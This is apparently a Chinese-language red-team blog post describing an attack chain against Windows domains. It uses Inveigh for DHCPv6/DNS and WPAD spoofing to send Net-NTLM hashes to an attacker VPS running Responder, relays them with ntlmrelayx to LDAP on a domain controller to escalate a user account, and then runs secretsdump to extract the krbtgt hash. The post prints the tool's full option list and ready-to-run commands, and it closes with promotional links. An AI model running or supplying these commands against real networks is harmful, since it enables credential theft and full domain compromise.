Inveigh結合DNS v6配合NTLM Relay 攻擊鏈的利用
Inveigh結合DNS v6配合NTLM Relay 的利用
通過Inveigh工具內網投毒,欺騙ipv6的DNS伺服器,進行WPAD欺騙,結合NTLM Relay攻擊鏈進行利用。
特點
驚該工具包含有以下協議的攻擊:
-LLMNR [packet sniffer | listener]
-DNS [packet sniffer | listener]
-mDNS [packet sniffer | listener]
-NBNS [packet sniffer | listener]
-DHCPv6 [packet sniffer | listener]
-ICMPv6 [privileged raw socket]
-HTTP [listener]
-HTTPS [listener]
-SMB [packet sniffer | listener]
-LDAP [listener]
-WebDAV [listener]
-Proxy Auth [listener]
引數
Inveigh.exe -?
Control:
-Inspect Default=Disabled: (Y/N) inspect traffic only.
-IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture.
-IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture.
-RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.
-RunTime Default=Unlimited: Run time duration in minutes.
Output:
-Console Default=3: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no informational, 3=all)
-ConsoleLimit Default=Unlimited: Limit to queued console entries.
-ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details.
-ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.
-FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output.
-FileOutput Default=Disabled: (Y/N) real time file output.
-FilePrefix Default=Inveigh: Prefix for all output files.
-FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.
-LogOutput Default=Disabled: (Y/N) outputting log entries.
Spoofers:
-DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing.
-DHCPv6TTL Default=300: Lease lifetime in seconds.
-DNS Default=Enabled: (Y/N) DNS spoofing.
-DNSHost Fully qualified hostname to use SOA/SRV responses.
-DNSSRV Default=LDAP: Comma separated list of SRV request services to answer.
-DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses.
-DNSTTL Default=30: DNS TTL in seconds.
-DNSTYPES Default=A: (A, SOA, SRV) Comma separated list of DNS types to spoof.
-ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements.
-ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
-IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing.
-IgnoreHosts Default=None: Comma separated list of hostnames to ignore when spoofing.
-IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing.
-IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
-Local Default=Disabled: (Y/N) performing spoofing attacks against the host system.
-LLMNR Default=Enabled: (Y/N) LLMNR spoofing.
-LLMNRTTL Default=30: LLMNR TTL in seconds.
-MAC Local MAC address for DHCPv6.
-MDNS Default=Enabled: (Y/N) mDNS spoofing.
-MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)
-MDNSTTL Default=120: mDNS TTL in seconds.
-MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)
-MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request.
-NBNS Default=Disabled: (Y/N) NBNS spoofing.
-NBNSTTL Default=165: NBNS TTL in seconds.
-NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)
-ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.
-ReplyToHosts Default=All: Comma separated list of hostnames to respond to when spoofing.
-ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing.
-ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
-SpooferIP Default=Autoassign: IP address included in spoofing responses.
-SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.
Capture:
-Cert Base64 certificate for TLS.
-CertPassword Base64 certificate password for TLS.
-Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.
-HTTP Default=Enabled: (Y/N) HTTP listener.
-HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.
-HTTPPorts Default=80: Comma seperated list of TCP ports for the HTTP listener.
-HTTPRealm Default=ADFS: Basic authentication realm.
-HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response.
-HTTPS Default=Enabled: (Y/N) HTTPS listener.
-HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener.
-IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad anmd proxy auth.
-LDAP Default=Enabled: (Y/N) LDAP listener.
-LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener.
-ListenerIP Default=Any: IP address for all listeners.
-ListenerIPv6 Default=Any: IPv6 address for all listeners.
-Machines Default=Disabled: (Y/N) machine account NetNTLM captures.
-Proxy Default=Disabled: (Y/N) proxy listener authentication captures.
-ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication.
-ProxyPort Default=8492: Port for the proxy listener.
-SMB Default=Enabled: (Y/N) SMB sniffer/listener.
-SMBPorts Default=445: Port for the SMB listener.
-SnifferIP Default=Autoassign: IP address included in spoofing responses.
-SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.
-WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.
-WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.
-WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)
-WPADResponse Default=Autogenerated: Contents of wpad.dat responses.
使用
在公網監聽
responder -I eth0 -wrfvP
使用Inveigh.exe在內網投毒,指定公網ip地址xx.xx.xx.xx
Inveigh.exe -DHCPv6 Y -SpooferIP
當目標計算機重啟或重新進行網路配置(如重新插入網線)時, 將會向DHCPv6傳送請求獲取IPv6配置,然後目標機器的IPv6 DNS將會設定為內網投毒機器的IPv6地址
當目標機器開啟瀏覽器時,會請求解析WPAD,此時內網毒化機器會將其解析到公網VPS
我們公網的VPS即可收到目標機器的Net-NTLM Hash了!
搭配ntlmrelayx
公網VPS執行如下命令監聽
proxychains -q python3 ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.211.55.4 -smb2support --no-dump
使用Inveigh.exe在內網投毒,指定公網ip地址
Inveigh.exe -DHCPv6 Y -SpooferIP xx.xx.xx.xx
當目標計算機重啟或重新進行網路配置(如重新插入網線)時, 將會向DHCPv6傳送請求獲取IPv6配置,然後目標機器的IPv6 DNS將會設定為內網投毒機器的IPv6地址
當目標機器開啟瀏覽器時,會請求解析WPAD,此時內網毒化機器會將其解析到公網VPS
我們公網的VPS即可收到目標機器的Net-NTLM Hash然後Relay到內網的域控執行高危操作了!
proxychains -q python3 secretsdump.py
xie/hack:P@[email protected] -just-dc-user krbtgt
可以在星球裡跟我討論交流。星球裡有一千w五百多位同樣愛好安全技術的小夥伴一起交流!
如果大家有有想參加2021HVV藍隊的,點選下面!!!:point_down|type_1_2::point_down|type_1_2::point_down|type_1_2:下面
- CobaltStrike WebServer特徵分析
- Inveigh結合DNS v6配合NTLM Relay 攻擊鏈的利用
- CVE-2021-26084-Confluence命令執行 全版本記憶體馬注入
- 域內最新提權漏洞原理深入分析
- 企業域安全設定(二)
- 某大廠紅隊評估_之_JDWP打點
- 某大廠紅隊評估_之_Apache Spark打點
- shad0w原理分析 part 1
- Linux系統安全-Linux啟動流程和服務管理(init和systemd)
- WMI攻擊檢測
- Exchange郵箱伺服器後利用
- Windows Print Spooler許可權提升漏洞( PrintNightmare)
- psexec工具的使用
- 你所不知道的NTLM Relay
- WMIC使用淺析
- Windows系統安全 | IPC$共享和其他共享(C$、D$、Admin$)
- Linux中編寫Shell指令碼
- Linux中sed工具的使用
- Linux中grep工具的使用
- Web漏洞|不安全的HTTP方法